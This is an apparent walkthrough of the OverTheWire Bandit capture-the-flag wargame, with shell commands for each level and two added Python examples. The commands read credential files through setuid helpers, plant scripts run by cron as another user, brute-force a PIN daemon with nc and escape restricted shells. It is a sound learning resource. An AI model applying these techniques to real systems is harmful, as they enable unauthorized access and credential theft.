Over The Wire (Bandit)

Level 0:

To get to level 0 we simply SSH into Bandit with the username bandit0 and the password bandit0.

Level 0 -> 1:

The password for the next level is stored in a file called readme located in the home directory.

bandit0@melinda:~$ cat readme

Level 1 -> 2:

The password for the next level is stored in a file called - located in the home directory. A bare - on the command line means "read standard input" to cat, so the file has to be named by a path that is not just a dash:

bandit1@melinda:~$ cat ./-

Level 2 -> 3:

The password for the next level is stored in a file called spaces in this filename located in the home directory. Unquoted, the shell would split that name into four separate arguments, so it has to be quoted (or every space escaped with a backslash):

bandit2@melinda:~$ cat "spaces in this filename"

Level 3 -> 4:

The password for the next level is stored in a hidden file in the inhere directory. Hidden files start with a dot and only show up with ls -a:

bandit3@melinda:~/inhere$ cat .hidden

Level 4 - >5:

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

The file names in inhere start with a dash, so they are passed as ./-* to stop file from reading them as options. Only one of them is reported as ASCII text; that is the file to cat.

bandit4@melinda:~/inhere$ file ./-*

Level 5 -> 6:

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties:
- human-readable
- 1033 bytes in size
- not executable

bandit5@melinda:~/inhere$ find -type f -size 1033c

Level 6 -> 7:

The password for the next level is stored somewhere on the server and has all of the following properties:
- owned by user bandit7
- owned by group bandit6
- 33 bytes in size

The size is 33 bytes (32 password characters plus the trailing newline), so the find expression must say -size 33c; 2>/dev/null hides the permission-denied errors from directories bandit6 cannot enter:

bandit6@melinda:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null

Level 7 -> 8:

The password for the next level is stored in the file data.txt next to the word millionth

bandit7@melinda:~$ awk '/^millionth/ {print $2;}' data.txt

Level 8 -> 9:

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once

uniq -u prints only the lines that are not repeated, and it needs sorted input:

bandit8@melinda:~$ sort data.txt | uniq -u

Level 9 -> 10:

The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.

bandit9@melinda:~$ strings data.txt | grep "="

Level 10 -> 11:

The password for the next level is stored in the file data.txt, which contains base64 encoded data

bandit10@melinda:~$ echo VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg== | base64 --decode

Level 11 -> 12:

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions

The character ranges must be quoted; unquoted, the shell treats the brackets as a glob and may replace them with matching file names:

bandit11@melinda:~$ echo Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Level 12 -> 13:

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the data file using cp, and rename it using mv (read the manpages!)

xxd -r turns the hexdump back into the binary file. From there, each step pipes the output into file - to learn what the next layer is, and the pipeline grows by one zcat, bzcat or tar xO per layer until file reports plain text:

bandit12@melinda:~$ mkdir /tmp/jhalon
bandit12@melinda:~$ xxd -r data.txt > /tmp/jhalon/file.bin
bandit12@melinda:/tmp/jhalon$ file file.bin
file.bin: gzip compressed data, was "data2.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | file -
/dev/stdin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | file -
/dev/stdin: gzip compressed data, was "data4.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | file -
/dev/stdin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | file -
/dev/stdin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | file -
/dev/stdin: gzip compressed data, was "data9.bin", from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat | file -
/dev/stdin: ASCII text

bandit12@melinda:/tmp/jhalon$ zcat file.bin | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

bandit12@melinda:/tmp$ rm -rf jhalon
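The chain above was worked out by hand, one file - probe per layer. The Python below is an added example, not part of the original walkthrough, that automates the same idea: it reverses a default-layout xxd dump the way xxd -r does, classifies each layer from its magic bytes (1f8b for gzip, BZh for bzip2, the ustar tag at offset 257 of a tar header) and peels it, stopping when plain data remains. The layer and byte caps are there on purpose: a blob nested like this is exactly the shape of a decompression bomb, and an unwrapper without limits is a denial-of-service waiting to happen. The hexdump it unwraps is constructed inline from a placeholder line with the same nesting as the level (gzip, tar, bzip2, tar, gzip, outermost first); it is not the level's data.txt, and the member names inside the tars are made up.

```python
import bz2
import gzip
import io
import tarfile

# Caps against decompression bombs: a nested blob like this is exactly what one looks like.
MAX_LAYERS = 32
MAX_BYTES = 64 * 1024 * 1024


def parse_xxd(dump: str) -> bytes:
    """Reverse a default-layout `xxd` dump ("offset: hex pairs  ascii"), like `xxd -r`."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue                                  # blank or stray line
        body = line.split(":", 1)[1]                  # drop the offset column
        hex_area = body.split("  ", 1)[0]             # the ASCII column follows two spaces
        out += bytes.fromhex(hex_area.replace(" ", ""))
    return bytes(out)


def layer_type(blob: bytes) -> str:
    """Classify the outermost wrapper from its magic bytes, as `file -` would."""
    if blob.startswith(b"\x1f\x8b"):
        return "gzip"
    if blob.startswith(b"BZh"):
        return "bzip2"
    if len(blob) >= 512 and blob[257:262] == b"ustar":  # POSIX/GNU tar header magic
        return "tar"
    return "data"


def unwrap(blob: bytes) -> tuple[list[str], bytes]:
    """Peel gzip / bzip2 / tar layers until plain data is left; return (layers, payload)."""
    layers: list[str] = []
    for _ in range(MAX_LAYERS):
        kind = layer_type(blob)
        if kind == "gzip":
            blob = gzip.decompress(blob)
        elif kind == "bzip2":
            blob = bz2.decompress(blob)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
                files = [m for m in tf.getmembers() if m.isfile()]
                if not files:
                    raise ValueError("tar layer contains no regular file")
                blob = tf.extractfile(files[0]).read()   # the level's archives hold one member
        else:
            return layers, blob
        if len(blob) > MAX_BYTES:
            raise ValueError("decompressed data exceeds the size cap; refusing to continue")
        layers.append(kind)
    raise ValueError(f"more than {MAX_LAYERS} layers; refusing to continue")


def solve_hexdump(dump: str) -> tuple[list[str], str]:
    """`xxd -r` plus repeated decompression in one call; returns (layers, decoded text)."""
    layers, payload = unwrap(parse_xxd(dump))
    return layers, payload.decode("utf-8", errors="replace")


# --- constructed sample input (placeholder text, not the level's data.txt) ---

def to_xxd(data: bytes, width: int = 16) -> str:
    """Render bytes in the default `xxd` layout; used only to build the sample dump."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        pairs = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {pairs:<{width * 5 // 2 - 1}}  {text}")
    return "\n".join(lines) + "\n"


def tar_one(payload: bytes, name: str) -> bytes:
    """Wrap a single in-memory member in an uncompressed tar archive."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


SAMPLE_TEXT = "The password is <placeholder, not a real password>\n"


def build_sample() -> str:
    """Nest the placeholder like the level (outermost first: gzip, tar, bzip2, tar, gzip)."""
    blob = gzip.compress(SAMPLE_TEXT.encode())
    blob = tar_one(blob, "data9.bin")
    blob = bz2.compress(blob)
    blob = tar_one(blob, "data5.bin")
    blob = gzip.compress(blob)
    return to_xxd(blob)


if __name__ == "__main__":
    found, text = solve_hexdump(build_sample())
    print(" -> ".join(found), "->", text.strip())
```

To use it on the real level, read data.txt into a string and pass it to solve_hexdump(); the returned layer list is the same sequence the manual pipeline discovered, one entry per zcat, bzcat or tar xO.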

Level 13 -> 14:

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

bandit13@melinda:~$ ssh -i sshkey.private bandit14@localhost

Level 14 -> 15:

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

bandit14@melinda:~$ telnet localhost 30000

Level 15 -> 16:

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…

bandit15@melinda:~$ openssl s_client -ign_eof -connect localhost:30001

Level 16 -> 17:

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

bandit16@melinda:~$ nmap -p 31000-32000 -sV localhost
bandit16@melinda:~$ echo cluFn7wTiGryunymYOu4RcffSxQluehd | openssl s_client -quiet -connect localhost:31790

Great! The server on 31790 answers with an RSA private key. Copy it (including the BEGIN and END header and footer lines) into a new file in a tmp directory, restrict its permissions so ssh accepts it, and use it to log in as bandit17.

bandit16@melinda:/tmp/jhalon$ nano sshkey.private
bandit16@melinda:/tmp/jhalon$ chmod 600 sshkey.private
bandit16@melinda:/tmp/jhalon$ ssh -i ./sshkey.private bandit17@localhost

Level 17 -> 18:

There are 2 files in the home directory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new.

With passwords.new given first, the line marked < in the diff output is the one from passwords.new:

bandit17@melinda:~$ diff passwords.new passwords.old

Level 18 -> 19:

The password for the next level is stored in a file readme in the home directory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

Rather than taking the interactive login shell, hand ssh a command to run: bash --norc starts a shell that does not read .bashrc, so the logout never fires, and from there readme can be read as usual.

root@kali:~# ssh bandit18@bandit.labs.overthewire.org "bash --norc"

Level 19 -> 20:

To gain access to the next level, you should use the setuid binary in the home directory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.

bandit19@melinda:~$ ./bandit20-do
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20

Level 20 -> 21:

There is a setuid binary in the home directory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

In one session, start a listener that hands the current password to whoever connects; in a second session, point suconnect at that port. suconnect reads the password from the listener and, if it matches, sends the bandit21 password back, which shows up in the first session:

(session 1) bandit20@melinda:~$ nc -l 32123 < /etc/bandit_pass/bandit20
(session 2) bandit20@melinda:~$ ./suconnect 32123

Level 21 -> 22:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@melinda:~$ cd /etc/cron.d/
bandit21@melinda:/etc/cron.d$ cat cronjob_bandit22
bandit21@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh

The cron entry runs /usr/bin/cronjob_bandit22.sh as bandit22, and that script copies the password into a file under /tmp that bandit21 is allowed to read:

cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Reading that /tmp file gives the password for bandit22.

Level 22 -> 23:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

This time the script derives the name of its /tmp output file from the MD5 of the string "I am user <name>", where <name> is the user it runs as. It runs as bandit23, so compute the hash for that string and read the matching file:

bandit22@melinda:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
bandit22@melinda:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349

Level 23 -> 24:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24
bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
bandit23@melinda:/etc/cron.d$ mkdir /tmp/jhalon
bandit23@melinda:/tmp/jhalon$ nano script.sh

#!/bin/bash
# Executed by the bandit24 cron job, so it runs as bandit24 and can read that
# user's password; write it somewhere bandit23 can read it back.
cat /etc/bandit_pass/bandit24 > /tmp/jhalon/pass

The cron job executes every file dropped into /var/spool/bandit24 as bandit24, so the script must be executable and the output directory must be writable by bandit24, otherwise the job cannot run it or cannot write the result. Once the job has run, the password is in /tmp/jhalon/pass:

bandit23@melinda:/tmp/jhalon$ chmod 777 /tmp/jhalon
bandit23@melinda:/tmp/jhalon$ chmod +x script.sh
bandit23@melinda:/tmp/jhalon$ cp script.sh /var/spool/bandit24
bandit23@melinda:/tmp/jhalon$ cat /tmp/jhalon/pass

Level 24 -> 25:

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24@melinda:~$ mkdir /tmp/jhalon
bandit24@melinda:~$ cd /tmp/jhalon
bandit24@melinda:/tmp/jhalon$ nano script.sh

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
# {0000..9999} keeps the leading zeros, so every pin is sent as four digits
for pin in {0000..9999}
do
    echo "$passwd $pin" | nc localhost 30002 >> result &
done
wait   # let all the background connections finish before looking at the output

bandit24@melinda:/tmp/jhalon$ chmod 755 script.sh
bandit24@melinda:/tmp/jhalon$ ./script.sh
bandit24@melinda:/tmp/jhalon$ sort result | uniq -u

Every wrong attempt produces the same response lines, so sort | uniq -u leaves only the one reply that differs: the one carrying the bandit25 password.
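The script above opens 10000 separate connections at once, which is slow and easily runs into process or connection limits. The Python below is an added example, not from the original walkthrough, of the same brute force done over a single connection: pins go out in batches and each batch's replies are read back before more are sent, so neither side ever blocks on a full socket buffer (a naive "send all 10000 lines, then read" client can deadlock that way). To run offline it talks to a mock of the port 30002 daemon over a socketpair; the daemon's protocol (one reply line per attempt, a line starting with "Wrong!" for a miss) and every credential string in it are assumptions, not the real service or its values. Against the live level you would hand brute_force_pin() a socket from socket.create_connection(("localhost", 30002)) instead.

```python
import socket
import threading

# Constructed stand-ins for the level's secrets; none of these are the real values.
DEMO_PASSWORD = "password-of-bandit24-placeholder"
DEMO_PIN = "7391"
DEMO_NEXT_PASSWORD = "password-of-bandit25-placeholder"
WRONG_LINE = b"Wrong! Please enter the correct pincode. Try again.\n"


def mock_pincode_daemon(conn: socket.socket) -> None:
    """Stand-in for the port 30002 service. ASSUMED protocol: it reads '<password> <pin>'
    lines until EOF and answers exactly one line per attempt."""
    try:
        with conn:
            buf = b""
            while True:
                data = conn.recv(4096)
                if not data:                         # client closed the connection
                    return
                buf += data
                while b"\n" in buf:
                    line, buf = buf.split(b"\n", 1)
                    if line.decode(errors="replace").split() == [DEMO_PASSWORD, DEMO_PIN]:
                        conn.sendall(f"Correct! The password of user bandit25 is "
                                     f"{DEMO_NEXT_PASSWORD}\n".encode())
                    else:
                        conn.sendall(WRONG_LINE)
    except (BrokenPipeError, ConnectionResetError):
        pass                                         # client left after finding the pin


def brute_force_pin(conn: socket.socket, password: str, batch: int = 250):
    """Try every pin 0000..9999 over ONE connection. Pins go out `batch` lines at a time
    and that batch's replies are read back before sending more, so neither side blocks
    on a full socket buffer. Returns (pin, reply line), or None if nothing but Wrong!
    ever comes back or the daemon hangs up."""
    pins = [f"{n:04d}" for n in range(10000)]       # zero-padded: the pin is four digits
    with conn.makefile("rwb") as f:
        for start in range(0, len(pins), batch):
            chunk = pins[start:start + batch]
            f.write("".join(f"{password} {pin}\n" for pin in chunk).encode())
            f.flush()
            for pin in chunk:
                reply = f.readline()
                if not reply:                        # daemon hung up early
                    return None
                text = reply.decode(errors="replace").strip()
                if text and not text.startswith("Wrong!"):
                    return pin, text
    return None


def run_demo(password: str = DEMO_PASSWORD):
    """Connect client and mock daemon through a socketpair so this runs offline. Against
    the live level, pass socket.create_connection(("localhost", 30002)) to brute_force_pin."""
    client_end, server_end = socket.socketpair()
    server = threading.Thread(target=mock_pincode_daemon, args=(server_end,), daemon=True)
    server.start()
    with client_end:
        result = brute_force_pin(client_end, password)
    server.join(timeout=5)
    return result


if __name__ == "__main__":
    print(run_demo())
```

The batch size is a trade-off between round trips and buffer pressure; 250 lines is far below any default socket buffer, so the client never writes while the peer is waiting for it to read.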

Level 25 -> 26:

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

/etc/passwd shows that bandit26's login shell is /usr/bin/showtext, a script that pages a text file with more and then exits. more only stops and waits for input when the text does not fit on the screen, so shrink the terminal before connecting; at the more prompt, v opens the file in vi, and inside vi the command :r /etc/bandit_pass/bandit26 followed by Enter reads the password into the buffer.

bandit25@melinda:~$ cat /etc/passwd | grep bandit26
bandit25@melinda:~$ cat /usr/bin/showtext
bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost
(in more) v
(in vi) :r /etc/bandit_pass/bandit26

3rd Jan

Over The Wire Bandit walkthrough (continued)

Level 26 -> 27:

On this level we are not given any hints, so we start by looking at what is in the home directory. ls shows a script, bandit27-do. Executing it without arguments prints a usage example: it runs whatever command it is given as user bandit27. That is enough to read the password file at /etc/bandit_pass/bandit27, and with that password we log in as bandit27 over SSH.

ls
./bandit27-do
./bandit27-do whoami
./bandit27-do cat /etc/bandit_pass/bandit27
ssh bandit27@localhost

Level 27 -> 28:

On this level we are told there is a git repository, and that the password for its bandit27-git user is the one we used to log in as bandit27. Cloning needs a directory we can write to, so we create one under /tmp and clone there. The clone contains a README, and reading it gives the password for the next level.

mkdir /tmp/pavan4
cd /tmp/pavan4
git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
ls
cd repo
ls
cat README

Level 28 -> 29:

Same setup: a git repository, reachable with the bandit28 password, which we clone into a fresh directory under /tmp. This time the README.md has the password blanked out.

mkdir /tmp/pavan5
cd /tmp/pavan5
git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
ls
cd repo/
ls
cat README.md

The password was probably in the file once and then removed, and git keeps the history of every change. The log shows that the most recent commit is called "fix info leak", which is a strong hint that the removal happened there. git show prints that commit together with its diff, and the removed line, password included, is still right there in the diff:

git show

Level 29 -> 30:

Again a git repository, this time for bandit29-git with the bandit29 password, cloned into a new directory under /tmp.

mkdir /tmp/pavan6
cd /tmp/pavan6
git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
ls
cd repo/
ls
cat README.md

The README.md on the default branch does not contain the password, so we list all branches, including the remote-tracking ones, switch to the dev branch and read its README.md, which does. With that we log in as bandit30.

git branch -a
git checkout dev
cat README.md
ssh bandit30@localhost

Level 30 -> 31:

Again a git repository, now for bandit30-git with the bandit30 password, cloned into a new directory under /tmp.

mkdir /tmp/pavan7
cd /tmp/pavan7
git clone ssh://bandit30-git@localhost/home/bandit30-git/repo

After cloning we list the repository. The README.md says only that it is an empty file, so it is time to enumerate more of the repository. Git can tag specific points in a repository's history as important, and tags sit outside the branch history, so they are easy to overlook. Listing the tags reveals one called secret, and showing it prints the password we were looking for. We then log in as bandit31 over SSH.

ls
cd repo
ls
cat README.md
git tag
git show secret
ssh bandit31@localhost

Level 31 -> 32:

Again a git repository, for bandit31-git with the bandit31 password, cloned into a new directory under /tmp.

mkdir /tmp/pavan8
cd /tmp/pavan8
git clone ssh://bandit31-git@localhost/home/bandit31-git/repo

The task here is to push a file, key.txt, to the repository. Once the file exists with the required content, we add it (forced with -f, because the repository's .gitignore would otherwise exclude it), commit, and push to origin. The push asks for the current user's password, and the server's response to the push contains the password for the next level.

git add -f key.txt
git commit -m "."
git push origin

Level 32 -> 33:

On reaching this level we are greeted with the message "Welcome to the Uppercase shell". To see what it does we run ls, which fails: the error says that LS is not found, so the shell upper-cases everything we type before executing it, and no normal command name survives that. The hint for this level is "it's time for another escape". The way out is the shell variable $0: the dollar sign and digits are unchanged by upper-casing, and $0 expands to the name of the shell that is running the command, so entering $0 starts that shell as a normal, non-upper-casing shell. ls -al shows that the uppercase shell is owned by bandit33, and since it is setuid the new shell runs as bandit33 and can read /etc/bandit_pass/bandit33. With the password we log in as bandit33 over SSH.

ls
$0
ls -al
cat /etc/bandit_pass/bandit33
ssh bandit33@localhost

Level 33:

This is the final level for now; the Bandit team is working on more. Logged in as bandit33, we run ls and find a README.txt in the home directory. It contains the final flag and a short message from the Over The Wire team. That concludes this series for now; we will solve more levels as soon as Over The Wire publishes them.

ls
cat README.txt